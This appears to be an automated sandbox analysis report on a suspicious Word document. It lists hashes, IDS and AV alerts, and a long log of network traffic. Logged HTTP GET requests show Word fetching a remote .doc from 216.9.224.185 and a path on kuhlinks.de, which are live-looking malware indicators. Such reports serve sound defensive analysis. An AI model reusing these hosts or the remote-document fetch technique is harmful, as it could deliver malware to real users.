Edit tour

Windows Analysis Report
IMP 7527518303 2507294.docx.doc

Overview

General Information

Sample name:	IMP 7527518303 2507294.docx.doc
Analysis ID:	1654507
MD5:	c8675988aa2bc47338861b4d62aa517d
SHA1:	67366589c5fbfa1153aa10a3d06b88d12719cdca
SHA256:	315b8754f30097fb04f76e09719a8415c53103a8c8abd6c7e988a918a2791476
Tags:	docuser-lowmal3
Infos:

Detection

Score:	60
Range:	0 - 100
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Contains an external reference to another file

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Sigma detected: Suspicious Office Outbound Connections

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 6820 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)

cleanup

Sigma Signatures

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49683, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 6820, Protocol: tcp, SourceIp: 104.21.47.51, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-02T11:55:34.333098+0200	2028371	3	Unknown Traffic	192.168.2.7	49683	104.21.47.51	443	TCP
2025-04-02T11:55:36.047206+0200	2028371	3	Unknown Traffic	192.168.2.7	49685	104.21.47.51	443	TCP

Joe Security ANOMALY Microsoft Office WebDAV Discovery

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-02T11:55:35.822625+0200	1810005	1	Potentially Bad Traffic	192.168.2.7	49684	104.21.47.51	443	TCP

Joe Sandbox Signatures

• AV Detection
• Compliance
• Software Vulnerabilities
• Networking
• System Summary
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: IMP 7527518303 2507294.docx.doc	Virustotal: Detection: 13%			Perma Link
Source: IMP 7527518303 2507294.docx.doc	ReversingLabs: Detection: 16%

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.47.51:443 -> 192.168.2.7:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.47.51:443 -> 192.168.2.7:49684 version: TLS 1.2

Source: global traffic

DNS query: name: kuhlinks.de

Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443

Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49687
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49687
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49694
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49694
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49694
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49694
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49694
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49694
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49694
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49694
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 192.168.2.7:49694 -> 104.21.47.51:443
Source: global traffic	TCP traffic: 104.21.47.51:443 -> 192.168.2.7:49694
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49687
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49687
Source: global traffic	TCP traffic: 216.9.224.185:80 -> 192.168.2.7:49692
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 216.9.224.185:80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.7:49684 -> 104.21.47.51:443

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49685 -> 104.21.47.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49683 -> 104.21.47.51:443

Source: global traffic	HTTP traffic detected: GET /3ri5DVX HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: kuhlinks.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 216.9.224.185

Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
